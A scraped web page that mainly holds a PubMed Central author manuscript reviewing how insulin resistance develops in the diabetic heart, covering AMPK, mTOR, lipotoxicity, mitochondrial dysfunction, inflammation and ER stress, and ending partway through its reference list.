problem. They seem to be able to eat whatever they want without ever gaining weight. People afflicted with this condition are usually underweight because their metabolic rate is so fast that they have difficulty gaining weight despite their caloric intake. Post your comments Post Anonymously Login username password forgot password? Register username password confirm email
__label__pos
0.630606
PMCCPMCCPMCC Search tips Search criteria  Advanced   Logo of nihpaAbout Author manuscriptsSubmit a manuscriptHHS Public Access; Author Manuscript; Accepted for publication in peer reviewed journal;   Trends Endocrinol Metab. Author manuscript; available in PMC 2012 October 1. Published in final edited form as: PMCID: PMC3183400 NIHMSID: NIHMS305930 New Insights into insulin resistance in the diabetic heart Abstract Insulin resistance is a major characteristic of obesity and type 2 diabetes and develops in multiple organs, including the heart. Compared to other organs, the physiological role of cardiac insulin resistance is not well understood. The heart uses lipid as a primary fuel, but glucose becomes an important source of energy in ischemia. The impaired ability to utilize glucose may contribute to cell death and abnormal function in the diabetic heart. Recent discoveries on the role of inflammation, mitochondrial dysfunction, and ER stress in obesity have advanced our understanding of how insulin resistance develops in peripheral organs. This review will apply these findings to the diabetic heart to provide new insights into the mechanism of cardiac insulin resistance. Facts about type 2 diabetes and obesity The prevalence of diabetes is increasing at an alarming rate, and the current world-wide diabetic population of 285 million is expected to almost double by the year 2030 [1]. In the U.S., diabetes affects 26 million people, accounting for more than 8% of the U.S. population. This disturbing trend is partly due to an epidemic increase in obesity, which is a major cause of type 2 diabetes. Recent data from the Centers for Disease Control and Prevention indicate that 68% of American adults are overweight. Daily consumption of food high in calories, along with a sedentary lifestyle, has led to the obesity epidemic. Thus, type 2 diabetes and obesity are intimately linked, and together they increase the risk of cardiovascular events, a leading cause of death in diabetic subjects [2]. Despite this apparent epidemiological evidence, how type 2 diabetes and obesity affect the heart remains poorly understood. Insulin resistance is a major characteristic of type 2 diabetes, and similar to other metabolic organs, the diabetic heart develops insulin resistance. As we begin to understand how insulin resistance develops in peripheral organs and the underlying role of obesity, inflammation, and ER stress in this process, it is reasonable to ask whether these causal events of peripheral insulin resistance underlie cardiac insulin resistance. This article reviews recently discovered mechanisms of peripheral insulin resistance and applies them to the diabetic heart to provide new insights into etiology of diabetic heart disease. Multi-faceted characteristics of the diabetic heart The human heart is a challenging organ in which to investigate, diagnose, and treat anomalies and disease states. When cardiac abnormality is phenotypically apparent or when patients are symptomatic, heart disease has often progressed to an advanced stage with limited therapeutic options. There are numerous abnormalities that can be detected in the hearts of diabetic and obese subjects. Structural changes are observed in the diabetic heart of humans and animal models. Concentric left ventricular (LV) hypertrophy, with increases in LV wall thickness and LV mass index, dilated cardiomyopathy, and extracellular fibrosis are found in the diabetic heart [3]. Functional abnormalities affecting LV systolic and diastolic function are also seen in the diabetic heart [4]. Tissue Doppler and flow analysis suggests that diastolic dysfunction may precede significant systolic disorder affecting ejection fraction and cardiac output in type 2 diabetes [5]. Further, there are metabolic changes in the diabetic heart such as increased lipid oxidation and intramyocardial accumulation of triglyceride [6]. The diabetic heart is also characterized by a reduced capacity to utilize glucose and insulin resistance [7]. Lastly, the diabetic heart manifests cellular changes including oxidative stress with increased generation of reactive oxygen species (ROS), mitochondrial dysfunction, and apoptosis [8]. With such multi-faceted abnormalities in the diabetic heart, it is difficult to discern which of these events is causally associated with type 2 diabetes and which events predispose the diabetic heart for failure. Metabolic Processes and Regulation of the Normal Heart Energy demand of the working heart Normal cardiac function is dependent on a constant rate of ATP synthesis by mitochondrial oxidative phosphorylation and to a much lesser extent, on glycolysis. Under physiological conditions, lipid oxidation is responsible for 60~80% of cardiac energy demand with the remainder provided by glucose metabolism [9]. The main source of lipid for cardiac metabolism is supplied by free fatty acids (FFA) bound to albumin and by fatty esters present in chylomicrons and very-low-density lipoproteins. Fatty acids can be taken up by cardiomyocytes passively via diffusion across the cell membrane as well as by a protein-mediated mechanism involving fatty acid transport proteins (FATPs) and CD36 [10]. FATP1 is a 646-amino acid integral plasma membrane protein that transports long-chain fatty acids and is highly expressed in tissues with active lipid metabolism, such as the heart, adipose tissue, and skeletal muscle [10]. CD36 is a transmembrane protein that transports long-chain fatty acids and is also highly expressed in heart, adipose tissue, and skeletal muscle [11]. In addition to fatty acid transport across the cell membrane, fatty acid binding proteins (FABPs) such as adipocyte FABP (aP2) and keratinocyte FABP (mal1) are abundant low-molecular weight cytoplasmic proteins that are involved in intracellular transport and metabolism of fatty acids [12]. Fatty acid carriers play an important role in lipid uptake into cardiomyocytes because Cd36 deletion markedly reduces myocardial lipid metabolism in mice [13]. Although mitochondrial lipid oxidation is the principal energy source for the normal heart, maintenance of cardiac glucose metabolism is important for normal cardiac function [14]. The heart is very similar to skeletal muscle in that both organs express GLUT4, the major insulin-responsive glucose transporter, and GLUT1. GLUT4 and GLUT1 account for 60% and 40% of total glucose carriers, respectively [15]. Glucose metabolism is at least 4-fold greater in heart than in skeletal muscle and adipose tissue, which may be attributed to a greater expression of GLUT4 proteins in the heart than in other organs [16]. Insulin further promotes glucose uptake into cardiomyocytes by binding to the insulin receptor on the cell-surface and activating intracellular signaling proteins. This involves auto-phosphorylation of the insulin receptor, tyrosine phosphorylation of insulin receptor substrate (IRS), and activation of phosphatidyl-inositol-3 kinase (PI 3-kinase), phosphoinositide-dependent kinase 1 (PDK1), Akt/protein kinase B (PKB), and protein kinase C (PKC)-λ/ζ [17]. Activation of insulin signaling leads to the translocation of glucose transporters (GLUT4) from an intracellular pool to the cell surface and increases glucose transport into cells [17]. Insulin also redistributes GLUT1 from an intracellular site to the surface of cardiomyocytes, but the effect of insulin on GLUT1 is smaller than its effect on GLUT4 [18]. The importance of glucose metabolism is demonstrated by findings from mice with heart-specific ablation of Slc2a4 (GLUT4; G4H−/−). These mice develop major morphological alterations in the heart and exhibit cardiac hypertrophy [19]. Insulin-stimulated glucose uptake is also completely abolished in the heart of G4H−/− mice, but basal cardiac glucose metabolism is elevated. Despite preserved cardiac contractile performance, ischemia-associated stress causes profound and irreversible systolic and diastolic dysfunction in G4H−/− mice [20]. Furthermore, in mice with cardiomyocyte-selective deletion of the insulin receptor (CIRKO) basal glucose transport in isolated cardiomyocytes and insulin action on glucose uptake and glycolysis in isolated working hearts are significantly diminished [21]. The hearts of CIRKO mice are smaller due to reduced cardiomyocyte size [21]. In contrast to the G4H−/− mice, the CIRKO heart shows a global impairment in cardiac function, affecting cardiac output and power, ventricular fractional shortening, and ejection fraction [21]. While these findings implicate cardiac insulin resistance in the pathogenesis of diabetic heart disease, the underlying mechanism remains unknown. AMPK is a major regulator of cardiac metabolism 5′AMP-activated protein kinase (AMPK), a serine-threonine kinase, is an important regulator of cardiac energy metabolism [22]. AMPK is a heterotrimer of an α catalytic subunit and β and γ regulatory subunits. Activation of AMPK is mediated by phosphorylation of the Thr172 residue located within the α1 and α2 catalytic subunits, and this process is regulated by upstream kinases (AMPK-activating protein kinases) such as LKB1 [23]. AMPK is activated during myocardial ischemia in response to an increased AMP/ATP ratio and to stimulation by hormones, such as leptin and adiponectin [24,25]. AMPK regulates lipid metabolism by phosphorylating and inactivating acetyl-CoA carboxylase (ACC) [26]. ACC is a biotin-dependent enzyme and catalyzes the synthesis of malonyl CoA, which is an essential substrate for fatty acid synthase and a potent inhibitor of carnitine palmitoyl-CoA transferase-I (CPT-I) [27]. Overall, AMPK acts as an important regulator of myocardial lipid oxidation by inactivating ACC and reducing malonyl CoA levels, which subsequently increase CPT-I activity and mitochondrial lipid oxidation (Figure 1). Fig. 1 Regulation of lipid and glucose metabolism by AMPK In addition to the regulatory role of AMPK on lipid metabolism, AMPK also modulates myocardial glucose utilization (Figure 1). AMPK acutely stimulates glucose transport into cells and chronically increases the expression of genes associated with glucose metabolism (e.g., GLUT) [29]. AMPK promotes translocation of glucose transporters from an intracellular pool to the plasma membrane, similar to the effects of insulin, and stimulates glycolytic enzymes such as 6-phosphofructo-2-kinase [29,30]. Further, AMPK-mediated increases in myocardial GLUT4 expression were shown to involve activation of PKC isoforms, possibly PKC-ε [31]. These metabolic effects of AMPK play a crucial role in providing energy via a non-oxidative pathway (i.e., glycolysis) in the ischemic heart when oxidative metabolism of glucose and fatty acids is impaired due to reduced oxygen supply. Consistent with this notion, increased AMPK activity by 5-aminoimidazole-4-carboxamide-1-β-D-ribofuranoside increases myocardial glucose transport activity and reduces cardiomyocyte apoptosis during ischemia [29,30]. In contrast, transgenic mice expressing a kinase dead or dominant negative form of AMPK show blunted myocardial glucose metabolism and increased cardiomyocyte apoptosis in response to ischemia [32]. These findings clearly indicate an important role for AMPK in cardiac energy metabolism. AMPK effects on energy metabolism also involve the insulin signaling pathway. In the heart, insulin stimulates ACC activity by inhibiting AMPK phosphorylation, and this accounts for insulin-mediated suppression of mitochondrial lipid oxidation [28]. Insulin’s inhibitory effect on AMPK is dependent on Akt activation which may involve Akt-mediated phosphorylation of AMPKα subunits on Ser485 or Ser491, that block LKB1-mediated Thr172 phosphorylation and activation of AMPK [33]. In this regard, the contribution of insulin resistance in enhanced lipid oxidation by the diabetic heart is currently unknown. Whereas insulin antagonizes AMPK action in the heart, insulin and AMPK signaling coordinately regulate glucose metabolism in skeletal muscle, liver, and adipocytes [33]. mTOR regulates protein synthesis and metabolism in the heart The mammalian target of rapamycin (mTOR), a serine-threonine kinase, is a major regulator of protein synthesis, glucose and lipid metabolism, and cell growth [34]. mTOR is comprised of two multiprotein complexes: mTOR complex 1 (mTORC1) consists of regulatory-associated protein of mTOR (Raptor) and mTOR complex 2 (mTORC2) consists of rapamycin-insensitive companion of mTOR (Rictor). Insulin activation of mTORC1 causes a phosphorylation of ribosomal protein S6 kinase 1 (S6K1) and eukaryotic translation initiation factor 4E (eIF-4E) binding protein 1 (4E-BP1) which promotes mRNA translation and protein synthesis [34]. A negative feedback regulation is provided by S6K1 which increases an inhibitory serine phosphorylation of IRS-1, leading to downregulation of insulin signaling [35]. Consistent with this notion, S6K1 deficiency enhances insulin sensitivity in diet-induced obese mice [36]. The mTORC2 plays a key role in insulin activation of Akt by phosphorylating Ser473 which primes Akt for Thr308 phosphorylation by PDK1 [34]. The Rictor plays an important role in this process since adipocyte ablation of rictor results in a loss of insulin-mediated Akt phosphorylation and dysregulated glucose and lipid metabolism [37]. In the heart, mTOR is regulated by exercise as high-intensity treadmill running increases mTOR activity via Akt activation, and promotes a physiological hypertrophic growth in mice [38]. Other studies using rapamycin found that mTOR inhibition rescues cardiac hypertrophy induced by pressure overload, suggesting that mTOR also mediates pathological remodeling of the heart [39]. In contrast, cardiac-specific overexpression of mTOR was recently shown to protect against pressure overload-induced cardiac dysfunction that involved mTOR-mediated attenuation of interstitial fibrosis and inflammation [40]. These findings support an important role for inflammation in heart failure and suggest that mTOR is an endogenous suppressor of the inflammatory response. Further, inducible, cardiac-specific ablation of mTOR impaired the hypertrophic response and accelerated heart failure in response to pressure overload that was associated with increased expression of 4E-BP1 [41]. Combined deletion of mTOR and 4E-BP1 markedly improved heart function and cardiomyocyte survival following pressure-overload stress [41]. Thus, while it is clear that hypertrophic growth, a salient feature of the diabetic heart, involves increased protein synthesis, the underlying mechanism by which mTOR affects cardiac remodeling in the diabetic heart is unknown. Abnormal Regulation of Energy Metabolism in the Diabetic Heart Altered energy metabolism in the diabetic heart A growing body of evidence indicates that perturbations in cardiac metabolism and insulin resistance are among the earliest diabetes-induced alterations in the myocardium, preceding both functional and pathological changes [42]. Studies using isolated perfused-heart preparations, cultured cardiomyocytes, and positron emission tomography (PET) have uniformly demonstrated insulin resistance in human and animal models of the diabetic heart [43,44]. Cardiac insulin resistance is associated with type 2 diabetes independent of coronary artery disease, hypertension, and changes in coronary blood flow [45]. In fact, insulin resistance develops in the heart of C57BL/6 mice as early as after 10 days of high-fat feeding, before the onset of insulin resistance in peripheral organs (i.e., skeletal muscle and liver) which occurs following 3 weeks of high-fat feeding [46]. Cardiac insulin resistance at this stage involved reductions in glucose uptake, Akt activity, and GLUT4 protein levels [46]. These findings indicate that diet-induced cardiac insulin resistance develops independent of alterations in systemic glucose metabolism and hyperinsulinemia. Further, cardiac insulin resistance in the early stage of obesity may be a physiological event when the excess lipid supply promotes increased lipid utilization and reduced glucose metabolism in the heart. However, a chronic state of insulin resistance and dysregulated metabolism may induce a pathological event involving cardiac remodeling and systolic dysfunction, which were observed in C57BL/6 mice after 20 weeks of high-fat feeding [46]. Similar observations were made in two commonly used genetic mouse models of obesity, leptin-deficient ob/ob mice and leptin receptor-deficient db/db mice, which showed increased lipid oxidation, reduced glucose oxidation and insulin resistance at 4 weeks of age [47]. These metabolic abnormalities were associated with decreases in myocardial efficiency and left ventricular systolic function at 10 weeks of age in db/db mice [47]. A prolonged state of high lipid oxidation in the diabetic heart may lead to functional derangements related to the accumulation of lipid intermediates, mitochondrial or peroxisomal generation of ROS, or excessive oxygen consumption [48]. Recent studies indicate that increased lipid oxidation may be causally associated with a reciprocal reduction in glucose metabolism in the diabetic heart [49]. The peroxisome proliferator-activated receptors (PPARs) are ligand-activated transcription factors that belong to the nuclear receptor superfamily, and of the three identified mammalian PPAR subtypes (α, γ, and δ), PPARα regulates nuclear expression of genes involved in lipid metabolism in the heart [50]. Transgenic mice with heart-selective overexpression of PPARα show increased lipid oxidation and concomitantly reduced glucose metabolism in the heart [51]. Heart-selective PPARα expressing mice also develop cardiac insulin resistance, and these metabolic derangements are associated with structural and functional changes resembling those of the diabetic heart [51,52]. These findings support a causal link between increased lipid oxidation and reduced glucose metabolism in the diabetic heart. Insulin resistance affects different cellular processes in individual organs Insulin resistance, defined as the impaired ability of insulin to stimulate glucose utilization, is an early and requisite event in the development of type 2 diabetes [53]. Insulin resistance is also widely considered to be one of the main risk factors for cardiovascular disease. Accumulating evidence points to a causal role for obesity in the initiation and progression of insulin resistance, but the underlying mechanism remains in debate. It is, however, clear that in the obese, insulin resistant state, the heart receives an increased supply of nutrients (i.e., fatty acids and glucose) that challenge the metabolic capacity and efficiency of the working heart. In skeletal muscle, insulin resistance involves reduced glucose transport and glycogen synthesis that results in blunted clearance of glucose following a meal (54). In the liver, insulin resistance causes excess production of glucose through enhanced gluconeogenesis and glycogen breakdown which contribute to fasting hyperglycemia, a hallmark of type 2 diabetes (55). In adipose tissue, insulin resistance results in excess breakdown of stored triglyceride into fatty acids (i.e., lipolysis) which is responsible for hyperlipidemia in the obese state (55). Insulin resistance in these organs is associated with defects in the insulin signaling pathway involving IRS-1, IRS-2, PI 3-kinase, and Akt [56]. In the heart, insulin resistance involves defects in insulin signaling, glucose transport, and glycogen storage in cardiomyocytes [46,57]. In this regard, cardiac insulin resistance is comparable to insulin resistance in skeletal muscle, which is not surprising given the similarities between cardiac muscle and skeletal muscle. Obesity-mediated insulin resistance in both organs has also been attributed to Randle’s glucose-fatty acid cycle [58]. However, it is widely believed that other mechanisms exist because defects in insulin signaling cannot be explained by Randle’s hypothesis. What then causes insulin resistance in the heart? A good starting point is to examine how insulin resistance develops in other organs. Dyslipidemia and lipotoxicity as a cause of cardiac insulin resistance Adipose tissue affects cardiac insulin sensitivity by releasing FFAs into the circulation, providing excess lipid for myocardial utilization, and leading to intracellular accumulation of triglyceride and lipid-derived metabolites [59] (Figure 2). Mice with muscle-specific overexpression of lipoprotein lipase, the rate-determining enzyme in the hydrolysis of triglyceride [60], develop insulin resistance that is associated with increases in intramuscular lipid and lipid-derived metabolites [61]. The underlying mechanism involves activation of a cohort of serine kinases including protein kinase C (PKC)-θ, IκB kinase-β (IKK-β), cJun NH2-terminal kinase (JNK), and S6-kinase, that promote serine phosphorylation of IRS proteins [6264]. These serine kinases may be activated by lipid-derived metabolites (e.g., fatty acyl CoAs, diacylglycerol, ceramide) [54,65]. Serine phosphorylation of IRS-1 impairs insulin-stimulated IRS-1 tyrosine phosphorylation and PI 3-kinase activity. The inhibitory action of TNF-α on insulin signaling has been shown to involve TNF-α mediated serine phosphorylation of IRS-1 [66] (Figure 2). In a recent study using a diet-induced obese porcine model, cardiac insulin resistance was due to increased Ser307 phosphorylation of IRS-1 and reduced PI3-kinase and Akt activation [67]. In contrast, cardiac insulin signaling was not altered despite reduced glucose metabolism in early obesity in mice [68]. Despite these discrepant findings, excess myocardial lipid has been associated with systolic and diastolic dysfunction in obese animals and humans [69,70]. While these results support a deleterious effect of excess lipid on cardiac insulin action, the role of serine kinases in the diabetic heart is unknown. Fig. 2 Fatty acid-mediated insulin resistance Mitochondrial dysfunction as a cause of cardiac insulin resistance Mitochondrial dysfunction has recently been linked to insulin resistance in obesity and aging [71]. Cardiac abnormality in obese mice is also associated with a reduction in mitochondrial oxidative capacity and increased mitochondrial uncoupling, an event that raises mitochondrial O2 consumption without parallel increases in energetics [72]. Obesity-mediated alterations in mitochondria may involve impaired insulin signaling, excess generation of ROS, and activation of uncoupling proteins (UCPs) [73]. The UCPs are mitochondrial inner membrane proteins that regulate the mitochondrial membrane potential necessary for ATP synthesis. The UCPs dissipate the proton gradient by transporting the protons from the space between the inner and outer mitochondrial membranes back into the mitochondrial matrix [74]. Of the 5 identified UCP homologs, UCP2 and UCP3 are expressed in the heart, and there is evidence for their involvement in mitochondrial uncoupling [75]. Studies have shown that UCP activity and mitochondrial uncoupling are enhanced, possibly by superoxides, but cardiac energetics and efficiency remain impaired in the diabetic heart [76]. Insulin resistance and reduced myocardial insulin signaling also contribute to fatty acid-mediated mitochondrial uncoupling, as cardiac fibers isolated from mice with a cardiomyocyte-specific deletion of the insulin receptor show increased mitochondrial uncoupling upon treatment with fatty acids [73]. Mitochondrial dysfunction affects cardiomyocytes in multiple ways. Because mitochondria control energy production, mitochondrial dysfunction may affect cardiomyocyte energetics and contractility [74]. Imbalance between mitochondrial uncoupling and lipid oxidation may enhance ROS generation and induce oxidative stress [75]. Myocardial uptake of fatty acids is increased as a result of an increased lipid supply in obesity. If mitochondrial oxidative capacity is reduced, possibly due to impaired insulin signaling, the myocardium may accumulate excess lipid and lipid intermediates that exacerbate insulin resistance and oxidative stress. Some studies have shown increased mitochondrial biogenesis in the diabetic heart, which may be a compensatory response to reduced mitochondrial function in cardiomyocytes [76]. On the other hand, myocardial activity of AMPK, which regulates mitochondrial biogenesis through activation of PGC-1α, is reduced in the heart of diet-induced obese mice [77]. Further, a recent study found that mitochondrial dysfunction may be a consequence rather than cause of insulin resistance [78]. Thus, while mitochondrial dysfunction clearly affects cardiac energetics and function, it remains unclear whether mitochondrial dysfunction plays a role in the etiology of insulin resistance in the diabetic heart. Inflammation and cytokines as a cause of cardiac insulin resistance Circulating levels of inflammatory cytokines, such as IL-6 and TNF-α, are elevated in obese, diabetic subjects, and the notion that type 2 diabetes has an inflammatory component is becoming widely accepted [79]. Adipose tissue was long considered to function mainly as a lipid storage organ. Recent evidence indicates that adipose tissue is an active endocrine organ capable of secreting hormones and cytokines (termed “adipokines”) that modulate energy balance, glucose and lipid homeostasis, and inflammation [79] (Figure 3). In obesity, macrophages infiltrate adipose tissue in response to local chemokines, such as monocyte chemoattractant protein (MCP)-1 [80]. Macrophages are also recruited to adipose tissue in response to apoptosis and form a distinctive crown-like structure surrounding dead or dying adipocytes in obesity [81]. Further, adipose tissue macrophages play a pivotal role in obesity and inflammation-mediated insulin resistance [82] (Figure 3). Mice with adipocyte-specific overexpression of MCP-1 develop insulin resistance associated with increased macrophage infiltration in adipose tissue [80]. In contrast, mice deficient in C-C motif chemokine receptor-2 (CCR-2), which binds to MCP-1 and regulates macrophage recruitment, show increased insulin sensitivity with reduced macrophage levels in adipose tissue [83]. Fig. 3 Adipose tissue is a major endocrine organ that produces hormones and cytokines TNF-α was the first inflammatory cytokine to be identified as a link between obesity and insulin resistance. Adipose mRNA expression of TNF-α was shown to be increased in several rodent models of obesity, and neutralization of TNF-α using a soluble TNF-α receptor-IgG chimeric protein improved insulin sensitivity in obese fa/fa rats [84]. TNF-α is shown to cause insulin resistance by suppressing IRS-associated insulin signaling and glucose transport activity in skeletal muscle [84]. IL-6 is a multi-functional cytokine that is produced and released by a wide variety of cell types, including monocytes/macrophages, fibroblasts, and endothelial cells in response to infections or injuries, and it plays an important role in the regulation of the immune system. Recent studies have shown that a significant amount of IL-6 is produced in metabolically-active organs including the heart and adipose tissue, and the degree of obesity is strongly correlated with plasma IL-6 levels in humans [85]. The biological activities of IL-6 involve the recruitment of signal-transducing molecules, such as SHP-2 and signal transducer and activator of transcription 3 (STAT3), leading to the expression of suppressor of cytokine signaling (SOCS)-3. In addition to kinases of the JAK family, IL-6 activates multiple serine/threonine kinases including JNK, p38 mitogen-activated protein (MAP) kinase, and PKC-δ. IL-6 causes insulin resistance by reducing IRS-associated insulin signaling and glucose metabolism [86]. The underlying mechanism involves IL-6 induced intracellular expression of SOCS-3 and subsequent inhibition of the insulin signaling network [87] (Figure 4). In this regard, mRNA expression of Socs3 is elevated in the adipocytes of obese, diabetic mice, and IL-6 stimulates SOCS-3 expression in adipocytes [88]. Fig. 4 Obesity induces local inflammation in heart and causes insulin resistance In obesity, inflammation also develops in liver and skeletal muscle and may play a role in insulin resistance in these organs [8991]. Fatty acids have been shown to activate IKKβ and nuclear factor-κB in hepatocytes, increase circulating levels of MCP-1 and cytokines, and cause insulin resistance in rat liver [89]. Diet-induced insulin resistance in skeletal muscle is associated with increased macrophage infiltration and local cytokine production in skeletal muscle, and these effects are reversed by the anti-inflammatory cytokine, IL-10 [86,92]. Skeletal muscle insulin resistance is also associated with inflammation in estrogen receptor α-deficient mice following a high-fat diet [93]. Obesity-mediated inflammation further develops in pancreatic islets and affects glucose-induced insulin secretion [94]. These observations lead to an obvious question: is there an inflammatory event in the heart in obesity? In this regard, a recent study reported profound inflammation in the obese heart, with marked increases in macrophages, cytokines, and SOCS3 levels in cardiomyocytes following high-fat feeding [95]. Diet-induced inflammation was associated with reduced glucose metabolism in the heart [95]. These deleterious effects of inflammation on cardiac metabolism were mediated by IL-6, which was shown to promote local inflammation and cause insulin resistance in the heart [95]. This is consistent with a recent study showing JNK-mediated regulation of adipocyte IL-6 secretion and hepatic insulin resistance in mice [96]. Furthermore, obesity-mediated inflammation and insulin resistance are associated with defects in myocardial activity of AMPK, a critical sensor of energy metabolism in the heart [22]. Altogether, these findings implicate a potential role of inflammation and cytokines in cardiac insulin resistance (Figure 4). ER stress and stress kinase signaling as a cause of cardiac insulin resistance The endoplasmic reticulum (ER) is a specialized perinuclear organelle involved in the synthesis of secreted and membrane-targeted proteins. ER stress results from an imbalance between protein load and folding capacity that leads to the unfolded protein response (UPR) [97]. The UPR activates 3 major ER signaling pathways including the PKR-like endoplasmic reticulum kinase, the inositol requiring-1 (IRE-1), and the activating transcription factor 6 pathways [98]. In the obese state, intracellular lipid accumulation activates IRE-1 and stress kinase signaling by factors such as JNK1 [99]. Treatment with chemical chaperones such as 4-phenyl butyric acid or tauroursode-oxycholic acid has been shown to attenuate ER stress and to improve insulin sensitivity in diet-induced obese mice [100]. These observations implicate an important role of ER homeostasis in obesity and insulin resistance. The 78-kDa glucose regulated protein, GRP78, also known as BiP (immunoglobulin heavy-chain binding protein) or HSPA5, is a key rheostat in regulating ER homeostasis [101]. GRP78 regulates ER function via protein folding and assembly, targeting misfolded protein for degradation, ER Ca2+ binding, and controlling the activation of transmembrane ER stress sensors [101]. Mice with a heterozygous deletion of Grp78 were recently shown to be resistant to diet-induced obesity, which was due to enhanced energy expenditure [102]. Grp78-deficient mice were also more insulin sensitive following high-fat feeding [102]. The underlying mechanism involves activation of an adaptive UPR in response to obesity stress, which resulted in improved ER homeostasis in adipose tissue [102]. Furthermore, a molecular scaffold, kinase suppressor of Ras 2 (KSR2) was recently shown to regulate energy balance and glucose homeostasis, which was mediated by KSR2 regulation of AMPK [103]. In both cell culture and animal models, KSR2 deficiency results in impaired energy expenditure, reduced glucose and lipid metabolism, obesity, and insulin resistance [103]. These findings implicate an important role for ER stress and ER homeostasis in glucose metabolism. The JNK signaling pathway is involved in the pathogenesis of obesity, insulin resistance, and type 2 diabetes [62]. In the obese condition generated by chronic high-fat feeding or genetic manipulation, JNK1 is activated and mediates downstream signaling events that target glucose metabolism [99]. JNK1 is known to promote the serine phosphorylation of IRS-1, and to inhibit insulin signaling transduction leading to insulin resistance [99]. Consistent with this, mice with muscle-selective deletion of JNK1 are protected from diet-induced insulin resistance and show increased Akt activation and glucose metabolism in skeletal muscle [104]. However, JNK1 plays a different role in liver as hepatocyte-selective deletion of JNK1 causes insulin resistance and hepatic steatosis [105]. In the brain, JNK1 is shown to regulate the hypothalamic-pituitary-thyroid axis as nervous system-selective JNK1 deletion causes a positive energy balance and enhances insulin sensitivity by increasing serum thyroid hormone levels [106]. These observations indicate that JNK1 exerts cell-autonomous effects on glucose metabolism. Concluding Remarks With insulin resistance playing such a significant role in the pathogenesis of type 2 diabetes and related complications that affect the heart, it is important that we understand the underlying mechanism by which cardiac insulin resistance develops. Although the heart primarily utilizes lipid for energy, glucose becomes a critical energy source in the oxygen-deficient state, such as in ischemia. Because endothelial dysfunction, atherosclerosis, and myocardial ischemia are characteristic features of type 2 diabetes [107,108], an impaired capacity to utilize glucose, as in the case of insulin resistance, may affect myocardial energy states and promote localized cell death. These effects may be exacerbated by obesity-induced inflammation and activation of stress kinase signaling. Indeed, the diabetic heart faces numerous stresses from hyperlipidemia, hyperglycemia, and inflammation, where insulin resistance may be a major intracellular event that predisposes the diabetic heart for its ultimate fate (Figure 5). Thus, identifying new therapeutic targets to improve insulin resistance in the heart may be an important step toward treatment of diabetic heart disease. Fig. 5 Diabetic heart faces many stresses Acknowledgments Dr. Kim’s work is supported by grants from the National Institutes of Health (R01-DK80756), American Diabetes Association (7-07-RA-80), and American Heart Association (0855492D). Dr. Gray’s work is supported by NIH grant (R01-DK080742). Footnotes Publisher's Disclaimer: This is a PDF file of an unedited manuscript that has been accepted for publication. As a service to our customers we are providing this early version of the manuscript. The manuscript will undergo copyediting, typesetting, and review of the resulting proof before it is published in its final citable form. Please note that during the production process errors may be discovered which could affect the content, and all legal disclaimers that apply to the journal pertain. References 1. Wild S, et al. Diabetes Care. 2004;27:1047–1053. [PubMed] 2. Grundy SM, et al. Diabetes and cardiovascular disease: a statement for healthcare professionals from the American Heart Association. Circulation. 1999;100:1134–1146. [PubMed] 3. Eguchi K, et al. Association between diabetes mellitus and left ventricular hypertrophy in a multiethnic population. Am J Cardiol. 2008;101:1787–1791. [PMC free article] [PubMed] 4. Bell DS. Heart failure: the frequent, forgotten, and often fatal complication of diabetes. Diabetes Care. 2003;26:2433–2441. [PubMed] 5. Boyer JK, et al. Prevalence of ventricular diastolic dysfunction in asymptomatic normotensive patients with diabetes mellitus. Am J Cardiol. 2004;93:870–875. [PubMed] 6. Taegtmeyer H, Passmore JM. Defective energy metabolism of the heart in diabetes. Lancet. 1985;1:139–141. [PubMed] 7. Iozzo P, et al. Independent association of type 2 diabetes and coronary artery disease with myocardial insulin resistance. Diabetes. 2002;51:3020–3024. [PubMed] 8. Barouch LA, et al. Cardiac myocyte apoptosis is associated with increased DNA damage and decreased survival in murine models of obesity. Circ Res. 2006;98:119–124. [PubMed] 9. Taegtmeyer H. Energy metabolism of the heart: from basic concepts to clinical applications. Curr Prob Cardiol. 1994;19:59–113. [PubMed] 10. Schaffer JE. Fatty acid transport: the roads taken. Am J Physiol Endocrinol Metab. 2001;282:E239–E246. [PubMed] 11. Coburn CT, et al. Role of CD36 in membrane transport and utilization of long-chain fatty acids by different tissues. J Mol Neurosci. 2001;16:117–121. [PubMed] 12. Glatz JFC, et al. Cellular fatty acid-binding proteins: their function and physiological significance. Prog Lipid Res. 1996;35:243–282. [PubMed] 13. Coburn CT, et al. Defective uptake and utilization of long chain fatty acids in muscle and adipose tissues of CD36 knockout mice. Proc Natl Acad Sci USA. 2000;275:32523–32529. [PubMed] 14. Stanley WC, et al. Regulation of energy substrate metabolism in the diabetic heart. Cardiovascular Res. 1997;34:25–33. [PubMed] 15. Fischer Y, et al. Insulin-induced recruitment of glucose transporters GLUT4 and GLUT1 in isolated rat cardiac myocytes. Evidence for the existence of different intracellular GLUT4 vesicle populations. J Biol Chem. 1997;272:7085–7092. [PubMed] 16. James DE, et al. Insulin-regulatable tissues express a unique insulin-sensitivei glucose transport protein. Nature. 1988;333:183–185. [PubMed] 17. White MF, Kahn CR. The insulin signaling system. J Biol Chem. 1994;269:1–4. [PubMed] 18. Fischer Y, et al. Action of metformin on glucose transport and glucose transporter GLUT1 and GLUT4 in heart muscle cells from healthy and diabetic rats. Endocrinology. 1995;136:412–420. [PubMed] 19. Abel ED, et al. Cardiac hypertrophy with preserved contractile function after selective deletion of GLUT4 from the heart. J Clin Invest. 1999;104:1703–1714. [PMC free article] [PubMed] 20. Tian R, Abel ED. Responses of GLUT4-deficient hearts to ischemia underscore the importance of glycolysis. Circulation. 2001;103:2961–2966. [PubMed] 21. Belke DB, et al. Insulin signaling coordinately regulates cardiac size, metabolism, and contractile protein isoform expression. J Clin Invest. 2002;109:629–639. [PMC free article] [PubMed] 22. Young LH, et al. AMP-activated protein kinase: a key stress signaling pathway in the heart. Trends Cardiovasc Med. 2005;15:110–118. [PubMed] 23. Koh HJ, et al. LKB1 and AMPK and the regulation of skeletal muscle metabolism. Curr Opin Clin Nutrition & Metab Care. 2008;11:227–232. [PMC free article] [PubMed] 24. Russell RR, III, et al. AMP-activated protein kinase mediates ischemic glucose uptake and prevents postischemic cardiac dysfunction, apoptosis, and injury. J Clin Invest. 2004;114:495–503. [PMC free article] [PubMed] 25. Minokoshi Y, et al. Leptin stimulates fatty-acid oxidation by activating AMP-activated protein kinase. Nature. 2002;415:339–343. [PubMed] 26. Kudo N, et al. Characterization of 5′AMP-activated protein kinase activity in the heart and its role in inhibiting acetyl-CoA carboxylase during reperfusion following ischemia. Biochim Biophys Acta. 1996;1301:67–75. [PubMed] 27. Abu-Elheiga L, et al. Continuous fatty acid oxidation and reduced fat storage in mice lacking acetyl-CoA carboxylase 2. Science. 2001;291:2613–2616. [PubMed] 28. Witters LA, 